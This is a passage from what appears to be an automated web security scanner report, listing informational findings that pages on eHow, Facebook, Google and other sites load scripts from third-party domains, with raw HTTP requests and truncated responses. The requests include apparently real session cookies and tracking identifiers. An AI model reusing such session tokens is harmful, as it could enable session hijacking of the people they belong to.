X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28790

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.556. https://www.ehow.com/js/i2a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/js/i2a.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

GET /js/i2a.js HTTP/1.1
Host: www.ehow.com
Connection: keep-alive
Referer: https://www.ehow.com/forms/PasswordRetrieval.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.1.10.1296659524; rsi_segs=; _dt=ts

Response

HTTP/1.1 404 File not Found
Date: Wed, 02 Feb 2011 15:12:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28790

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.557. https://www.ehow.com/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/privacy.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49056

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Privacy Policy | eHow.com</title>
       <meta charse
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.558. https://www.ehow.com/terms_use.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/terms_use.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

GET /terms_use.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73067

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Terms of Use | eHow.com</title>
       <meta charset=
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.559. https://www.ehow.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html
Content-Location: http://www.ehow.com/xd_receiver.htm
Last-Modified: Tue, 17 Aug 2010 04:48:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Wed, 02 Feb 2011 15:45:18 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.560. http://www.elib.org/articles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elib.org
Path:	/articles/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /articles/ HTTP/1.1
Host: www.elib.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Pingback: http://www.elib.org/articles/xmlrpc.php
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head profile="ht
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.561. http://www.elib.org/articles/category/wordpress/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elib.org
Path:	/articles/category/wordpress/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /articles/category/wordpress/ HTTP/1.1
Host: www.elib.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Pingback: http://www.elib.org/articles/xmlrpc.php
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head profile="ht
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.562. http://www.everydaylifestyles.com/articles3.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.everydaylifestyles.com
Path:	/articles3.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.googleadservices.com/pagead/conversion.js
http://www.trkzilla.com/tracking202/static/landing.php?lpip=9246

Request

Response

18.563. http://www.evow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.evow.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.evow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.564. http://www.exploit-db.com/exploits/15313/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.exploit-db.com
Path:	/exploits/15313/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /exploits/15313/ HTTP/1.1
Host: www.exploit-db.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:07:21 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 04:07:21 GMT
ETag: W/"4a15e0-3879-49b58e6f3b040"
Accept-Ranges: bytes
Content-Length: 14457
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.565. http://www.f-secure.com/weblog/archives/00001972.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.f-secure.com
Path:	/weblog/archives/00001972.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true
http://www.haloscan.com/load/fslabs

Request

GET /weblog/archives/00001972.html HTTP/1.1
Host: www.f-secure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 01 Feb 2011 14:03:14 GMT
Content-Type: text/html
Date: Thu, 03 Feb 2011 04:07:23 GMT
Content-Length: 14543
Connection: close
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta na
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.haloscan.com/load/fslabs"> </script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...

18.566. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.567. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=J5foX; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:01 GMT
Content-Length: 30789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/VI44PqgS-Cz.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.568. http://www.facebook.com/%s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.569. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.570. http://www.facebook.com/MillenniumHotels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/MillenniumHotels

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /MillenniumHotels HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

18.571. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.572. http://www.facebook.com/btaylor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/btaylor

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.573. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.574. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.575. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.576. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.577. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.578. http://www.facebook.com/ligatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ligatt

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.579. http://www.facebook.com/platform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/platform

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.580. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.581. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

18.582. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.583. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.584. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

18.585. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.586. http://www.facebook.com/policy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.587. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.588. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.589. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.590. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

Response

18.591. http://www.google.com/accounts/TOS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/accounts/TOS

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /accounts/TOS HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Date: Thu, 03 Feb 2011 04:46:12 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close
Content-Length: 45227

<html><head><title>Google Terms of Service</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style type="text/css">
body,td,div,p,a,font,span{font-family:arial,sans-seri
...[SNIP]...
<link href="//www.google.com/accounts/google.css" rel="stylesheet">
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.592. http://www.google.com/ig/adde previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/ig/adde

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/ga.js
http://www.google-analytics.com/urchin.js

Request

GET /ig/adde HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 19:24:39 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Server: igfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Personalize Your Homepa
...[SNIP]...
<div id="footer" align="center"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://www.google-analytics.com/ga.js"> >
...[SNIP]...

18.593. http://www.google.com/intl/en/options/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/options/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET /intl/en/options/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 19:40:45 GMT
Date: Wed, 02 Feb 2011 15:50:16 GMT
Expires: Wed, 02 Feb 2011 15:50:16 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

...<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<base href="http://www.google.com">
<title>More Google Products</title>
<link rel="stylesheet" href="/options/default.css">

<div id="id">

<
...[SNIP]...
</div>

<script src="//www.google-analytics.com/ga.js"></script>
...[SNIP]...

18.594. http://www.google.com/support/chrome/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/chrome/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

18.595. http://www.google.com/support/websearch/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/websearch/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

18.596. http://www.google.com/uds/solutions/localsearch/gmlocalsearch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
